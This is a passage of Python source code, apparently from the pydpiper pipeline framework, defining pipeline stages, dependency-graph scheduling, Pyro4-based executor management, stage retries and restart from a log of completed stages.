#os.environ["PYRO_LOGFILE"] = os.path.splitext(os.path.basename(__file__))[0] + ".log"
# TODO name the server logfile more descriptively
logger = logging # type: Any
#logger = logging.getLogger(__name__)
logger.basicConfig(filename="pipeline.log", level=os.getenv("PYDPIPER_LOGLEVEL", "INFO"),
datefmt="%Y-%m-%d %H:%M:%S",
format="[%(asctime)s.%(msecs)03d,"
+__name__+",%(levelname)s] %(message)s") # type: ignore
import Pyro4 # type: ignore
from . import pipeline_executor as pe
from pydpiper.execution.queueing import create_uri_filename_from_options
Pyro4.config.SERVERTYPE = pe.Pyro4.config.SERVERTYPE
LOOP_INTERVAL = 5
STAGE_RETRY_INTERVAL = 1
sys.excepthook = Pyro4.util.excepthook # type: ignore
class PipelineFile(object):
def __init__(self, filename):
self.filename = filename
self.setType()
def setType(self):
self.fileType = None
def __repr__(self):
return(self.filename)
class InputFile(PipelineFile):
def setType(self):
self.fileType = "input"
class OutputFile(PipelineFile):
def setType(self):
self.fileType = "output"
class LogFile(PipelineFile):
def setType(self):
self.fileType = "log"
"""
The executor client class:
client: URI string to represent the executor
maxmemory: the total amount of memory the executor has at its disposal
will be used to keep track of the stages it's running and whether
it's still alive (based on a periodic heartbeat)
"""
class ExecClient(object):
def __init__(self, client, maxmemory):
self.clientURI = client
self.maxmemory = maxmemory
self.running_stages = set([])
self.timestamp = time.time()
def memoize_hook(hook): # TODO replace with functools.lru_cache (?!) in python3
data = Namespace(called=False, result=None) # because of Python's bizarre assignment rules
def g():
if data.called:
return data.result
else:
data.result = hook()
data.called = True
return data.result
return g
class PipelineStage(object):
def __init__(self):
self.mem = None # if not set, use pipeline default
self.procs = 1 # default number of processors per stage
# the input files for this stage
self.inputFiles = [] # type: List[str]
# the output files for this stage
self.outputFiles = [] # type: List[str]
self.logFile = None
self.status = None
self.name = ""
self.colour = "black" # used when a graph is created of all stages to colour the nodes
self.number_retries = 0
# functions to be called when the stage becomes runnable
# (these might be called multiple times, so should be benign
# in some sense)
self._runnable_hooks = []
# functions to be called when a stage finishes
self.finished_hooks = []
def add_runnable_hook(self, h, memoize=True):
self._runnable_hooks.append((memoize_hook if memoize else lambda x: x)(h))
def isFinished(self):
return self.status == "finished"
def setRunning(self):
self.status = "running"
def setFinished(self):
self.status = "finished"
def setFailed(self):
self.status = "failed"
def setNone(self):
self.status = None
def setMem(self, mem):
self.mem = mem
def getMem(self):
return self.mem
def setProcs(self, num):
self.procs = num
def getProcs(self):
return self.procs
def getHash(self):
return(hash("".join(self.outputFiles) + "".join(self.inputFiles)))
def __eq__(self, other):
return self.inputFiles == other.inputFiles and self.outputFiles == other.outputFiles
def __ne__(self, other):
return not(self.__eq__(other))
def getNumberOfRetries(self):
return self.number_retries
def incrementNumberOfRetries(self):
self.number_retries += 1
class CmdStage(PipelineStage):
pipeline_start_time = datetime.isoformat(datetime.now())
logfile_id = 0
def __init__(self, argArray):
PipelineStage.__init__(self)
self.cmd = [] # the input array converted to strings
self.parseArgs(argArray)
#self.checkLogFile()
def parseArgs(self, argArray):
if argArray:
for a in argArray:
ft = getattr(a, "fileType", None)
s = intern(str(a))
if ft == "input":
self.inputFiles.append(s)
elif ft == "output":
self.outputFiles.append(s)
self.cmd.append(s)
self.name = self.cmd[0]
def checkLogFile(self): # TODO silly, this is always called since called by __init__
if not self.logFile:
self.logFile = self.name + "." + CmdStage.pipeline_start_time + '-' + str(CmdStage.logfile_id) + ".log"
CmdStage.logfile_id += 1
def setLogFile(self, logFileName):
self.logFile = str(logFileName)
def execStage(self):
of = open(self.logFile, 'a')
of.write("Running on: " + socket.gethostname() + " at " + datetime.isoformat(datetime.now(), " ") + "\n")
of.write(repr(self) + "\n")
of.flush()
args = split(repr(self))
returncode = subprocess.call(args, stdout=of, stderr=of, shell=False)
of.close()
return(returncode)
def getHash(self):
"""Return a small value which can be used to compare objects.
Use a deterministic hash to allow persistence across restarts (calls to `hash` and `__hash__`
depend on the value of PYTHONHASHSEED as of Python 3.3)"""
return hashlib.md5("".join(self.cmd).encode()).hexdigest()
def __repr__(self):
return(" ".join(self.cmd))
def __eq__(self, other):
return (self is other) or (self.__class__ == other.__class__ and self.cmd == other.cmd)
def __hash__(self):
return tuple(self.cmd).__hash__()
"""A graph with no edge information; see networkx/classes/digraph.py"""
class ThinGraph(nx.DiGraph):
all_edge_dict = {'weight': 1}
def single_edge_dict(self):
return self.all_edge_dict
edge_attr_dict_factory = single_edge_dict
class Pipeline(object):
# TODO the way we initialize a pipeline is currently a bit gross, e.g.,
# setting a bunch of instance variables after __init__ - the presence of a method
# called `initialize` should be a hint that all is perhaps not well, but perhaps
# there is indeed some information legitimately unavailable when we first construct
def __init__(self, stages, options):
# the core pipeline is stored in a directed graph. The graph is made
# up of integer indices
# main set of options, needed since (a) we don't bother unpacking
# every single option into `self`, (b) since (most of) the option set
# is needed to launch new executors at run time
self.pipeline_name = options.application.pipeline_name
self.options = options
self.exec_options = options.execution
self.G = ThinGraph()
# a map from indices to the number of unfulfilled prerequisites
# of the corresponding graph node (will be populated later -- __init__ is a misnomer)
self.unfinished_pred_counts = []
# an array of the actual stages (PipelineStage objects)
self.stages = []
self.nameArray = []
# indices of the stages ready to be run
self.runnable = set()
# an array to keep track of stage memory requirements
self.mem_req_for_runnable = []
# a hideous hack; the idea is that after constructing the underlying graph,
# a pipeline running executors locally will measure its own maxRSS (once)
# and subtract this from the amount of memory claimed available for use on the node.
self.memAvail = None
self.currently_running_stages = set()
# the current stage counter
self.counter = 0
# hash to keep the output to stage association
self.outputhash = {}
# a hash per stage - computed from inputs and outputs or whole command
self.stage_dict = {}
self.num_finished_stages = 0
self.failedStages = []
# location of backup files for restart if needed
self.backupFileLocation = self._backup_file_location()
# table of registered clients (using ExecClient class instances) indexed by URI
self.clients = {}
# number of clients (executors) that have been launched by the server
# we need to keep track of this because even though no (or few) clients
# are actually registered, a whole bunch of them could be waiting in the
# queue
self.number_launched_and_waiting_clients = 0
# clients we've lost contact with due to crash, etc.
self.failed_executors = 0
# time to shut down, due to walltime or having completed all stages?
# (use an event rather than a simple flag for shutdown notification
# so that we can shut down even if a process is currently sleeping)
self.shutdown_ev = None # was Event(), but this is too slow
self.programName = None
self.skipped_stages = 0
self.verbose = 0
# report back to the user which percentage of the pipeline stages has finished
# keep track of the last percentage that was printed
self.percent_finished_reported = 0
# Handle to write out processed stages to
self.finished_stages_fh = None
self.outputDir = self.options.application.output_directory or os.getcwd()
# TODO this doesn't work with the qbatch-based server submission on Graham:
if self.options.execution.submit_server and self.options.execution.local:
# redirect the standard output to a text file
serverLogFile = os.path.join(self.outputDir, self.pipeline_name + '_server_stdout.log')
LINE_BUFFERING = 1
sys.stdout = open(serverLogFile, 'a', LINE_BUFFERING)
for s in stages:
self._add_stage(s)
self.createEdges()
# could also set this on G itself ...
# TODO the name "unfinished" here is probably misleading since nothing is marked "finished";
# even though the "graph heads" are enqueued here, this will be changed later when completed stages
# are skipped :D
self.unfinished_pred_counts = [ len([i for i in self.G.predecessors(n)
if not self.stages[i].isFinished()])
for n in range(self.G.order()) ]
graph_heads = [n for n in self.G.nodes()
if self.unfinished_pred_counts[n] == 0]
logger.info("Graph heads: " + str(graph_heads))
for n in graph_heads:
self.enqueue(n)
# expose methods to get/set shutdown_ev via Pyro (setter not needed):
def set_shutdown_ev(self):
self.shutdown_ev.set()
def get_shutdown_ev(self):
return self.shutdown_ev
def getNumberFailedExecutors(self):
return self.failed_executors
def getNumberFailedStages(self):
return len(self.failedStages)
def getTotalNumberOfStages(self):
return len(self.stages)
def getNumberProcessedStages(self):
return self.num_finished_stages
def getNumberOfRunningClients(self):
return len(self.clients)
def getNumberOfQueuedClients(self):
return self.number_launched_and_waiting_clients
def setVerbosity(self, verbosity):
self.verbose = verbosity
def getCurrentlyRunningStages(self):
return self.currently_running_stages
def getNumberRunnableStages(self):
return len(self.runnable)
def getMemoryRequirementsRunnable(self):
return self.mem_req_for_runnable
def getMemoryAvailableInClients(self):
return [c.maxmemory for _, c in self.clients.items()]
def _add_stage(self, stage):
"""adds a stage to the pipeline"""
# check if stage already exists in pipeline - if so, don't bother
# check if stage exists - stage uniqueness defined by in- and output
# for base stages and entire command for CmdStages
# FIXME this logic is rather redundant and can be simplified
# (assuming that the set of stages the pipeline is given has
# the same equality relation as is used here)
# FIXME as getHash is called several times per stage, cache the hash in the stage.
# To save memory, we could make use of the fact that strings
# are actually interned, so it might be faster/cheaper
# just to store/compare the pointers.
h = stage.getHash()
if h in self.stage_dict:
self.skipped_stages += 1
#stage already exists - nothing to be done
else: #stage doesn't exist - add it
self.stage_dict[h] = self.counter
#self.statusArray[self.counter] = 'notstarted'
self.stages.append(stage)
self.nameArray.append(stage.name)
# add all outputs to the output dictionary
for o in stage.outputFiles:
self.outputhash[o] = self.counter
# add the stage's index to the graph
self.G.add_node(self.counter, label=stage.name, color=stage.colour)
self.counter += 1
# huge hack since default isn't available in CmdStage() constructor
# (may get overridden later by a hook, hence may really be wrong ... ugh):
if stage.mem is None and self.exec_options is not None:
stage.setMem(self.exec_options.default_job_mem)
def _backup_file_location(self, outputDir=None):
loc = os.path.join(outputDir or os.getcwd(),
self.pipeline_name + '_finished_stages')
return loc
def printStages(self, name):
print("Total number of stages in the pipeline: ", len(self.stages))
def printNumberProcessedStages(self):
print("Number of stages already processed: ", self.num_finished_stages)
def createEdges(self):
"""computes stage dependencies by examining their inputs/outputs"""
starttime = time.time()
# iterate over all nodes
for i in self.G.nodes():
for ip in self.stages[i].inputFiles:
# if the input to the current stage was the output of another
# stage, add a directional dependence to the DiGraph
if ip in self.outputhash:
self.G.add_edge(self.outputhash[ip], i)
endtime = time.time()
logger.info("Create Edges time: " + str(endtime-starttime))
def get_stage_info(self, i):
s = self.stages[i]
return pe.StageInfo(mem=s.mem, procs=s.procs, ix=i, cmd=s.cmd, log_file=s.logFile,
output_files=s.outputFiles, env_vars=s.env_vars)
def getStage(self, i):
"""given an index, return the actual pipelineStage object"""
return(self.stages[i])
# getStage<...> are currently used instead of getStage due to previous bug; could revert:
def getStageMem(self, i):
return(self.stages[i].mem)
def getStageProcs(self,i):
return(self.stages[i].procs)
def getStageCommand(self,i):
return(repr(self.stages[i]))
def getStageLogfile(self,i):
return(self.stages[i].logFile)
def is_time_to_drain(self):
return self.shutdown_ev.is_set()
# FIXME this isn't quite right ... once this is set, clients connecting
# normally over the next few seconds will crash (note they have no jobs,
# so this is sort of OK)
"""Given client information, issue commands to the client (along similar
lines to getRunnableStageIndex) and update server's internal view of client.
This is highly stateful, being a resource-tracking wrapper around
getRunnableStageIndex and hence a glorified Set.pop."""
def getCommand(self, clientURIstr, clientMemFree, clientProcsFree):
if self.is_time_to_drain():
return ("shutdown_abnormally", None)
# TODO now that getRunnableStageIndex pops from a set,
# intelligently look for something this client can run
# (e.g., by passing available resources
# into getRunnableStageIndex)?
if clientMemFree == 0:
logger.debug("Executor has no free memory")
return ("wait", None)
if clientProcsFree == 0:
logger.debug("Executor has no free processors")
return ("wait", None)
flag, i = self.getRunnableStageIndex()
if flag == "run_stage":
eps = 0.000001
memOK = self.getStageMem(i) <= clientMemFree + eps
procsOK = self.getStageProcs(i) <= clientProcsFree
if memOK and procsOK:
return (flag, i)
else:
if not memOK:
logger.debug("The executor does not have enough free memory (free: %.2fG, required: %.2fG) to run stage %d. (Executor: %s)", clientMemFree, self.getStageMem(i), i, clientURIstr)
if not procsOK:
logger.debug("The executor does not have enough free processors (free: %.1f, required: %.1f) to run stage %d. (Executor: %s)", clientProcsFree, self.getStageProcs(i), i, clientURIstr)
self.enqueue(i)
return ("wait", None)
else:
return (flag, i)
"""Return a tuple of a command ("shutdown_normally" if all stages are finished,
"wait" if no stages are currently runnable, or "run_stage" if a stage is
available) and the next runnable stage if the flag is "run_stage", otherwise
None"""
def getRunnableStageIndex(self):
if self.allStagesCompleted():
return ("shutdown_normally", None)
elif len(self.runnable) == 0:
return ("wait", None)
else:
index = self.runnable.pop()
# remove an instance of currently required memory
try:
self.mem_req_for_runnable.remove(self.stages[index].mem)
except:
logger.debug("mem_req_for_runnable: %s; mem: %s", self.mem_req_for_runnable, self.stages[index].mem)
logger.exception("It wasn't here!")
return ("run_stage", index)
def allStagesCompleted(self):
return self.num_finished_stages == len(self.stages)
def addRunningStageToClient(self, clientURI, index):
try:
self.clients[clientURI].running_stages.add(index)
except:
print("\nError: could not find client %s while trying to add running stage" % clientURI)
raise
def removeRunningStageFromClient(self, clientURI, index):
try:
c = self.clients[clientURI]
except:
print("\nError: could not find client %s while trying to remove running stage" % clientURI)
raise
else:
try:
c.running_stages.remove(index)
except:
print("\nError: unable to remove stage index from registered client: %s" % clientURI)
logger.exception("Could not remove stage index from running stages list")
raise
#@Pyro4.oneway
def setStageStarted(self, index, clientURI):
URIstring = "(" + str(clientURI) + ")"
logger.info("Starting Stage " + str(index) + ": " + str(self.stages[index]) + URIstring)
# There may be a bug in which a stage is added to the runnable set multiple times.
# It would be better to catch that earlier (by using a different/additional data structure)
# but for now look for the case when a stage is run twice at the same time, which may
# produce bizarre results as both processes write files
if self.stages[index].status == 'running':
raise Exception('stage %d is already running' % index)
self.addRunningStageToClient(clientURI, index)
self.currently_running_stages.add(index)
self.stages[index].setRunning()
def checkIfRunnable(self, index):
"""stage added to runnable set if all predecessors finished"""
canRun = ((not self.stages[index].isFinished()) and (self.unfinished_pred_counts[index] == 0))
#logger.debug("Stage %s Runnable: %s", str(index), str(canRun))
return canRun
def setStageFinished(self, index, clientURI, save_state = True,
checking_pipeline_status = False):
"""given an index, sets corresponding stage to finished and adds successors to the runnable set"""
s = self.stages[index]
# since we want to use refcounting (where a 'reference' is an
# unsatisfied dependency of a stage and 'collection' is
# adding to the set of runnable stages) to determine whether a stage's
# prerequisites have run, we make it an error for the same stage
# to finish more than once (alternately, we could merely avoid
# decrementing counts of previously finished stages, but
# this choice should expose bugs sooner)
if s.isFinished():
raise ValueError("Already finished stage %d" % index)
# this function can be called when a pipeline is restarted, and
# we go through all stages and set the finished ones to... finished... :-)
# in that case, we can not remove the stage from the list of running
# jobs, because there is none.
if checking_pipeline_status:
s.status = "finished"
else:
logger.info("Finished Stage %s: %s (on %s)", str(index), str(self.stages[index]), clientURI)
self.removeFromRunning(index, clientURI, new_status = "finished")
# run any potential hooks now that the stage has finished:
for f in s.finished_hooks:
f(s)
self.num_finished_stages += 1
# do some reporting in terms of how many stages have been completed:
roughly_processed = math.floor(self.num_finished_stages / len(self.stages) * 100)
if roughly_processed > self.percent_finished_reported:
# only report it after we've checked the status of the pipeline
if self.verbose and not checking_pipeline_status:
print("\n\nStatus update: " + "\n" + str(self.num_finished_stages) +
" out of " + str(len(self.stages)) + " stages finished.\n" + time.ctime() +
"\nFor more detailed information run (in a separate shell with paths set appropriately):\ncheck_pipeline_status.py "
+ str(self.exec_options.urifile) + "\n")
self.percent_finished_reported = roughly_processed
# write out the (index, hash) pairs to disk. We don't actually need the indices
# for anything (in fact, the restart code in skip_completed_stages is resilient
# against an arbitrary renumbering of stages), but a human-readable log is somewhat useful.
if not checking_pipeline_status:
self.finished_stages_fh.write("%d,%s\n" % (index, self.stages[index].getHash()))
self.finished_stages_fh.flush()
# FIXME flush could turned off as an optimization (more sensibly, a small buffer size could be set)
# ... though we might not record a stage's completion, this doesn't affect correctness.
for i in self.G.successors(index):
self.unfinished_pred_counts[i] -= 1
if self.checkIfRunnable(i):
self.enqueue(i)
def removeFromRunning(self, index, clientURI, new_status):
try:
self.currently_running_stages.discard(index)
except:
logger.exception("Unable to remove stage %d from client %s's stages: %s", index, clientURI, self.clients[clientURI].running_stages)
self.removeRunningStageFromClient(clientURI, index)
self.stages[index].status = new_status
def setStageLost(self, index, clientURI):
"""Clean up a stage lost due to unresponsive client"""
logger.warning("Lost Stage %d: %s: ", index, self.stages[index])
self.removeFromRunning(index, clientURI, new_status = None)
self.enqueue(index)
def setStageFailed(self, index, clientURI):
# given an index, sets stage to failed, adds to failed stages array
# But... only if this stage has already been retried twice (<- for now static)
# Once in while retrying a stage makes sense, because of some odd I/O
# read write issue (NFS race condition?). At least that's what I think is
# happening, so trying this to see whether it solves the issue.
num_retries = self.stages[index].getNumberOfRetries()
if num_retries < 2:
# without a sleep statement, the stage will be retried within
# a handful of milliseconds, that won't solve anything...
# this sleep command will block the server for a small amount
# of time, but should happen only sporadically
#time.sleep(STAGE_RETRY_INTERVAL)
self.removeFromRunning(index, clientURI, new_status = None)
self.stages[index].incrementNumberOfRetries()
logger.info("RETRYING: ERROR in Stage " + str(index) + ": " + str(self.stages[index]) + "\n"
+ "RETRYING: adding this stage back to the runnable set.\n"
+ "RETRYING: Logfile for Stage " + str(self.stages[index].logFile) + "\n")
self.enqueue(index)
else:
self.removeFromRunning(index, clientURI, new_status = "failed")
logger.info("ERROR in Stage " + str(index) + ": " + str(self.stages[index]))
# This is something we should also directly report back to the user:
print("\nERROR in Stage %s: %s" % (str(index), str(self.stages[index])))
print("Logfile for (potentially) more information:\n%s\n" % self.stages[index].logFile)
sys.stdout.flush()
self.failedStages.append(index)
for i in nx.dfs_successors(self.G, index).keys():
self.failedStages.append(i)
@functools.lru_cache(maxsize=None) # must cache *all* results!
def prepare_to_run(self, i):
"""Some pre-run tasks that must only run once
(in the current model, `enqueue` may run arbitrarily many times!)"""
for f in self.stages[i]._runnable_hooks:
f(self.stages[i])
# the easiest place to ensure that all stages request at least
# the default job mem is here. The hooks above might estimate
# memory for the jobs, here we'll override that if they requested
# less than the minimum
if self.stages[i].mem < self.exec_options.default_job_mem:
self.stages[i].setMem(self.exec_options.default_job_mem)
# scale everything by the memory_factor
# FIXME this may run several times ... weird !!
self.stages[i].setMem(self.stages[i].mem * self.exec_options.memory_factor)
def enqueue(self, i):
"""Update pipeline data structures and run relevant hooks when a stage becomes runnable."""
#logger.debug("Queueing stage %d", i)
self.runnable.add(i)
self.prepare_to_run(i)
# keep track of the memory requirements of the runnable jobs
self.mem_req_for_runnable.append(self.stages[i].mem)
"""
Returns True unless all stages are finished, then False
This function also checks to see whether executors can be launched. The
server keeps track of how many executors are launched/registered. If the
server set to launch executors itself, it will do so if there are runnable
stages and the addition of launched/registered executors is smaller than
the max number of executors it can launch
"""
def continueLoop(self):
if self.verbose:
print('.', end="", flush=True)
# We may be have been called one last time just as the parent thread is exiting
# (if it wakes us with a signal). In this case, don't do anything:
if self.shutdown_ev.is_set():
logger.debug("Shutdown event is set ... quitting")
return False
elif self.allStagesCompleted():
logger.info("All stages complete ... done")
return False
# exit if there are still stages that need to be run,
# but when there are no runnable nor any running stages left
# (e.g., if some stages have repeatedly failed)
# TODO this might indicate a bug, so better reporting would be useful
elif (len(self.runnable) == 0
and len(self.currently_running_stages) == 0):
logger.info("ERROR: no more runnable stages, however not all stages have finished. Going to shut down.")
print("\nERROR: no more runnable stages, however not all stages have finished. Going to shut down.\n")
sys.stdout.flush()
return False
# return False if all executors have died but not spawning new ones:
# 1) there are stages that can be run, and
# 2) there are no running nor waiting executors, and
# 3) the number of lost executors has exceeded the number of allowed failed executors
elif (len(self.runnable) > 0 and
(self.number_launched_and_waiting_clients + len(self.clients)) == 0 and
self.failed_executors > self.exec_options.max_failed_executors):
msg = ("\nError: %d executors have died. This is more than the number"
"(%d) allowed by --max-failed-executors. No executors remain; exiting..."
% (self.failed_executors, self.exec_options.max_failed_executors))
print(msg)
logger.warning(msg)
return False
# TODO combine with above clause?
else:
if len(self.runnable) > 0:
highest_mem_stage = self.highest_memory_stage(self.runnable)
max_memory_required = highest_mem_stage.mem
if ((len(self.runnable) > 0) and
# require no running jobs rather than no clients
# since in some configurations (e.g., currently SciNet config has
# the server-local executor shut down only when the server does)
# the latter choice might lead to the system
# running indefinitely with no jobs
(self.number_launched_and_waiting_clients + len(self.clients) == 0 and
max_memory_required > self.memAvail)):
msg = ("\nShutting down due to jobs (e.g. `%s`) which require more memory (%.2fG) than the amount requestable. "
"Please use the --mem argument to increase the amount of memory that executors can request."
% (str(highest_mem_stage)[:1000], max_memory_required))
print(msg)
logger.warning(msg)
return False
else:
return True
#@Pyro4.oneway
def updateClientTimestamp(self, clientURI, tick):
t = time.time() # use server clock for consistency
try:
self.clients[clientURI].timestamp = t
logger.debug("Client %s updated timestamp (tick %d)",
clientURI, tick)
except:
print("\nError: could not find client %s while updating the time stamp" % clientURI)
logger.exception("clientURI not found in server client list:")
raise
# requires: stages != []
# a better interface might be (self, [stage]) -> { MemAmount : (NumStages, [Stage]) }
# or maybe the same using a heap (to facilitate getting N stages with most memory)
def highest_memory_stage(self, stages):
s = max(stages, key=lambda i: self.stages[i].mem)
return self.stages[s]
def max_memory_required(self, stages):
return self.highest_memory_stage(stages).mem # TODO don't use below, propagate stage # ....
# this can't be a loop since we call it via sockets and don't want to block the socket forever
def manageExecutors(self):
logger.debug("Checking if executors need to be launched ...")
executors_to_launch = self.numberOfExecutorsToLaunch()
if executors_to_launch > 0:
# RAM needed to run a single job:
max_memory_stage = self.highest_memory_stage(self.runnable)
memNeeded = max_memory_stage.mem # self.max_memory_required(self.runnable)
# RAM needed to run `proc` most expensive jobs (not the ideal choice):
memWanted = sum(sorted([self.stages[i].mem for i in self.runnable],
key = lambda x: -x)[0:self.exec_options.proc])
logger.debug("wanted: %s", memWanted)
logger.debug("needed: %s", memNeeded)
if memNeeded > self.memAvail:
msg = "\nA stage (%s) requires %.2fG of memory to run, but max allowed is %.2fG" \
% (str(max_memory_stage)[:1000], memNeeded, self.memAvail)
logger.error(msg)
print(msg)
else:
if self.exec_options.greedy:
mem = self.memAvail
elif memWanted <= self.memAvail:
mem = memWanted
else:
mem = self.memAvail #memNeeded?
try:
self.launchExecutorsFromServer(executors_to_launch, mem)
print("\nSubmitted " + str(executors_to_launch) + " executors (clients) to the queue."
"\nWaiting for them to register with the server...")
except pe.SubmitError:
logger.exception("Failed to submit executors; will retry")
logger.debug("... checking for crashed executors ...")
if self.exec_options.monitor_heartbeats:
# look for dead clients and requeue their jobs
t = time.time()
# copy() as unregisterClient mutates self.clients during iteration over the latter
for uri,client in self.clients.copy().items():
dt = t - client.timestamp
if dt > pe.HEARTBEAT_INTERVAL + self.exec_options.latency_tolerance:
logger.warning("Executor at %s has died (no contact for %.1f sec)!", client.clientURI, dt)
ct = time.time()
logger.warning("Difference between time used as reference and current time: %.3f", ct-t)
print("\nWarning: there has been no contact with %s, for %.1f seconds. Considering the executor as dead!\n" % (client.clientURI, dt))
if self.failed_executors > self.exec_options.max_failed_executors:
logger.warning("Currently %d executors have died. This is more than the number of allowed failed executors as set by the flag: --max-failed-executors. Too many executors lost to spawn new ones" % self.failed_executors)
self.failed_executors += 1
# the unregisterClient function will automatically requeue the
# stages that were associated with the lost client
self.unregisterClient(client.clientURI)
logger.debug("... done.")
"""
Returns an integer indicating the number of executors to launch
This function first verifies whether the server can launch executors
on its own (self.exec_options.nums_exec != 0). Then it checks to
on its own (self.options.nums_exec != 0). Then it checks to
see whether the executors are able to kill themselves. If they are,
it's possible that new executors need to be launched. This happens when
there are runnable stages, but the number of active executors is smaller
than the number of executors the server is able to launch
"""
def numberOfExecutorsToLaunch(self):
if self.failed_executors > self.exec_options.max_failed_executors:
return 0
if (len(self.runnable) > 0 and
self.max_memory_required(self.runnable) > self.memAvail):
# we might still want to launch executors for the stages with smaller
# requirements
return 0
if self.exec_options.num_exec != 0:
# Server should launch executors itself
# This should happen regardless of whether or not executors
# can kill themselves, because the server is now responsible
# for the initial launches as well.
active_executors = self.number_launched_and_waiting_clients + len(self.clients)
desired_num_executors = min(len(self.runnable), self.exec_options.num_exec)
executor_launch_room = desired_num_executors - active_executors
# there are runnable stages, and there is room to launch
# additional executors
return max(executor_launch_room, 0)
else:
return 0
def launchExecutorsFromServer(self, number_to_launch, memNeeded):
logger.info("Launching %i executors", number_to_launch)
try:
launchPipelineExecutors(options=self.options, number=number_to_launch,
mem_needed=memNeeded, uri_file=self.exec_options.urifile)
self.number_launched_and_waiting_clients += number_to_launch
except:
logger.exception("Failed launching executors from the server.")
raise
def getProcessedStageCount(self):
return self.num_finished_stages
def registerClient(self, clientURI, maxmemory):
# Adds new client (represented by a URI string)
# to array of registered clients. If the server launched
# its own clients, we should remove 1 from the number of launched and waiting
# clients (It's possible though that users launch clients themselves. In that
# case we should not decrease this variable)
# FIXME this is a completely broken way to decide whether to decrement ...
self.clients[clientURI] = ExecClient(clientURI, maxmemory)
if self.number_launched_and_waiting_clients > 0:
self.number_launched_and_waiting_clients -= 1
logger.debug("Client registered (Eh!): %s", clientURI)
if self.verbose:
print("\nClient registered (Eh!): %s" % clientURI, end="")
#@Pyro4.oneway
def unregisterClient(self, clientURI):
# removes a client URI string from the table of registered clients. An executor
# calls this method when it decides on its own to shut down,
# and the server may call it when a client is unresponsive
logger.debug("unregisterClient: un-registering %s", clientURI)
try:
for s in self.clients[clientURI].running_stages.copy():
self.setStageLost(s, clientURI)
del self.clients[clientURI]
except:
if self.verbose:
print("\nUnable to un-register client: " + clientURI)
logger.exception("Unable to un-register client: " + clientURI)
else:
if self.verbose:
print("\nClient un-registered (Cheers!): " + clientURI, end="")
logger.info("Client un-registered (Cheers!): " + clientURI)
def incrementLaunchedClients(self):
self.number_launched_and_waiting_clients += 1
def skip_completed_stages(self):
logger.debug("Consulting logs to determine skippable stages...")
try:
with open(self.backupFileLocation, 'r') as fh:
# a stage's index is just an artifact of the graph construction,
# so load only the hashes of finished stages
previous_hashes = frozenset((e.split(',')[1] for e in fh.read().split()))
except:
logger.info("Finished stages log doesn't exist or is corrupt.")
return
runnable = []
finished = []
completed = 0
while True:
# self.runnable should be populated initially by the graph heads.
# Traverse the graph by removing stages from the runnable set and,
# if they don't need to be re-run, adding their dependencies to that set
# (via setStageFinished); if they do, accumulate them. Once this set is emptied,
# we have computed a set of stages which must and can be run
# (either because the input/output filenames or command has changed
# or because an ancestor has re-run, i.e., the files themselves have changed)
# but whose ancestors have already been run
flag,i = self.getRunnableStageIndex()
if i == None:
break
s = self.getStage(i)
if not isinstance(s, CmdStage):
runnable.append(i)
continue
h = s.getHash()
# we've never run this command before
if not h in previous_hashes:
runnable.append(i)
continue
if self.options.application.smart_restart:
latest_input_mtime = max([os.stat(inputFile).st_mtime for inputFile in s.inputFiles])
latest_output_mtime = max([os.stat(outputFile).st_mtime for outputFile in s.outputFiles])
#this command's inputFiles were modified after its outputFiles, so rerun it.
if (latest_input_mtime > latest_output_mtime):
runnable.append(i)
continue
self.setStageFinished(i, clientURI = "fake_client_URI", checking_pipeline_status = True)
finished.append((i, h)) # stupid ... duplicates logic in setStageFinished ...
completed += 1
logger.debug("Runnable: %s", runnable)
for i in runnable:
self.enqueue(i)
with open(self.backupFileLocation, 'w') as fh:
# TODO For further optimization, it might (?) be even faster to write to memory and then
# make a single file write when finished.
# FIXME should write to tmp file in same dir, then overwrite (?) since a otherwise an interruption
# in writing this file will cause progress to be lost
for l in finished:
fh.write("%d,%s\n" % l)
logger.info('Previously completed stages (of %d total): %d', len(self.stages), completed)
def printShutdownMessage(self):
# it is possible that pipeline.continueLoop returns false, even though the
# pipeline is not completed (for instance, when stages failed, and no more stages
# can be run) so check that in order to provide the correct feedback to the user
print("\n\n######################################################")
print("Shutting down (" + str(len(self.clients)) + " clients remaining) ...")
if self.allStagesCompleted():
print("All pipeline stages have been processed.")
print("Pipeline finished successfully!")
else:
print("Not all pipeline stages have been processed,")
print("however there are no more stages that can be run.")
print("Pipeline failed...")
print("######################################################\n")
logger.debug("Clients still registered at shutdown: " + str(self.clients))
sys.stdout.flush()
def launchPipelineExecutors(options, mem_needed, number, uri_file):
"""Launch pipeline executors directly from pipeline"""
if options.execution.local or not options.execution.queue_type:
for _ in range(number):
e = pe.pipelineExecutor(options=options.execution,
uri_file=uri_file,
pipeline_name=options.application.pipeline_name,
memNeeded=mem_needed)
# since launchPipelineExecutors can be called from server,
# need some concurrency or pe.launchExecutor will hang server ....
threading.Thread(target=pe.launchExecutor, args=(e,)).start()
#pe.launchExecutor(e)
else:
pipelineExecutor = pe.pipelineExecutor(options=options.execution,
uri_file=uri_file,
pipeline_name=options.application.pipeline_name,
memNeeded=mem_needed)
pipelineExecutor.submitToQueue(number=number)
def launchServer(pipeline):
options = pipeline.options
pipeline.printStages(options.application.pipeline_name)
pipeline.printNumberProcessedStages()
# expensive, so only create for pipelines that will actually run
pipeline.shutdown_ev = Event()
# for ideological reasons this should live in a method, but pipeline init is
# rather baroque anyway, and arguably launchServer/pipelineDaemon ought to be
# a single method with cleaned-up initialization
executors_local = pipeline.exec_options.local or (pipeline.exec_options.queue_type is None)
if executors_local:
# measured once -- we assume that server memory usage will be
# roughly constant at this point
pipeline.memAvail = pipeline.exec_options.mem - (float(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss) / 10**6) # 2^20?
else:
pipeline.memAvail = pipeline.exec_options.mem
# is the server going to be verbose or not?
if options.application.verbose:
verboseprint = print
else:
verboseprint = lambda *args: None
# getIpAddress is similar to socket.gethostbyname(...)
# but uses a hack to attempt to avoid returning localhost (127....)
network_address = Pyro4.socketutil.getIpAddress(socket.gethostname(),
workaround127 = True, ipVersion = 4)
daemon = Pyro4.core.Daemon(host=network_address)
pipelineURI = daemon.register(pipeline)
if options.execution.use_ns:
# in the future we might want to launch a nameserver here
# instead of relying on a separate executable running
ns = Pyro4.locateNS()
ns.register("pipeline", pipelineURI)
else:
# If not using Pyro NameServer, must write uri to file for reading by client.
uf = open(options.execution.urifile, 'w')
uf.write(pipelineURI.asString())
uf.close()
pipeline.setVerbosity(options.application.verbose)
shutdown_time = pe.EXECUTOR_MAIN_LOOP_INTERVAL + options.execution.latency_tolerance
try:
t = Process(target=daemon.requestLoop)
# t.daemon = True
t.start()
